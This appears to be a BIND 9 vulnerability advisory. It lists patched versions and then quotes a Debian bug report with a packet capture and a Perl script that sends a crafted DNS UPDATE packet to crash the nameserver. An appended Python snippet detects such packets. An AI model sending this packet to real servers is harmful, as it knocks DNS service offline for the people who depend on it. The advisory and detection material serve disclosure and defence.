BIND High-Severity Vulnerability
2010-08-10
Affects all bind9 versions.

BIND versions in which this issue has been fixed: Upgrade BIND to one of 9.4.3-P3, 9.5.1-P3 or 9.6.1-P1. These versions can be downloaded from:
http://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz
http://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz
http://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz

Attack code:
Package: bind9
Severity: normal
bind can be crashed with an update packet:
Packet in tcpdump:
15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]
Another view of the Packet:
| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0 opcode = UPDATE rcode = NOERROR
| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa. IN SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR
Such a packet can be created with perl:
-----------------
#!/usr/bin/perl -w
use Net::DNS;

our $NSI          = '';
our $NSI_KEY_NAME = '';
our $NSI_KEY      = '';

my $rzone = '';
my $rptr  = "1.$rzone";

my $packet = Net::DNS::Update->new($rzone);

# Prerequisite section: CLASS IN, TYPE ANY, TTL 0
$packet->push(
    pre => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'IN',
        Type  => 'ANY',
        TTL   => 0,
    )
);

# Update section: CLASS ANY, TYPE ANY
$packet->push(
    update => Net::DNS::RR->new(
        Name  => $rptr,
        Class => 'ANY',
        Type  => 'ANY',
    )
);

$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
--------------------
bind only crashes if the FQDN used exists on the nameserver.
-- System Information:
Debian Release: 5.0.2
APT prefers proposed-updates
APT policy: (500, 'proposed-updates'), (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
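
For detection, the following added Python example (not part of the original post or the Debian report) parses a DNS message taken from a UDP payload and flags UPDATE messages whose prerequisite section carries a CLASS IN, TYPE ANY record, as in the packet view above. The function names and the sample messages are constructed for illustration; a TCP length prefix is assumed to be stripped already.

```python
import struct

OPCODE_UPDATE = 5            # RFC 2136
TYPE_ANY, CLASS_IN = 255, 1

def skip_name(msg, off):
    """Return the offset just past the (possibly compressed) name at off."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:   # compression pointer: two bytes, ends the name
            return off + 2
        off += 1 + length

def has_in_any_prereq(msg):
    """True if msg is an UPDATE with a prerequisite of CLASS IN, TYPE ANY."""
    try:
        _id, flags, zocount, prcount, _up, _ad = struct.unpack_from("!6H", msg, 0)
        if (flags >> 11) & 0xF != OPCODE_UPDATE:
            return False
        off = 12
        for _ in range(zocount):            # zone entry: name, type, class
            off = skip_name(msg, off) + 4
        for _ in range(prcount):            # RR: name, type, class, ttl, rdlength, rdata
            off = skip_name(msg, off)
            rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
            if rtype == TYPE_ANY and rclass == CLASS_IN:
                return True
            off += 10 + rdlen
        return False
    except (struct.error, IndexError):
        return False                        # truncated or malformed message

# Constructed samples (zone "example.", owner "host.example."), not captured traffic.
ZONE = b"\x07example\x00" + b"\x00\x06\x00\x01"            # SOA, IN
OWNER = b"\x04host\xc0\x0c"                                # pointer to the zone name
UPDATE_HDR = b"\x12\x34\x28\x00\x00\x01\x00\x01\x00\x00\x00\x00"
SAMPLES = {
    "update, prereq IN/ANY": UPDATE_HDR + ZONE + OWNER + b"\x00\xff\x00\x01" + b"\x00" * 6,
    "update, prereq ANY/ANY (name in use)": UPDATE_HDR + ZONE + OWNER + b"\x00\xff\x00\xff" + b"\x00" * 6,
    "query, qtype ANY": b"\x12\x34\x01\x00\x00\x01" + b"\x00" * 6 + b"\x07example\x00\x00\xff\x00\x01",
}

if __name__ == "__main__":
    for label, msg in SAMPLES.items():
        print(f"{label}: {'FLAG' if has_in_any_prereq(msg) else 'ok'}")
```

The RFC 2136 "name is in use" prerequisite uses CLASS ANY with TYPE ANY, so the check matches on CLASS IN specifically and leaves that legitimate form unflagged.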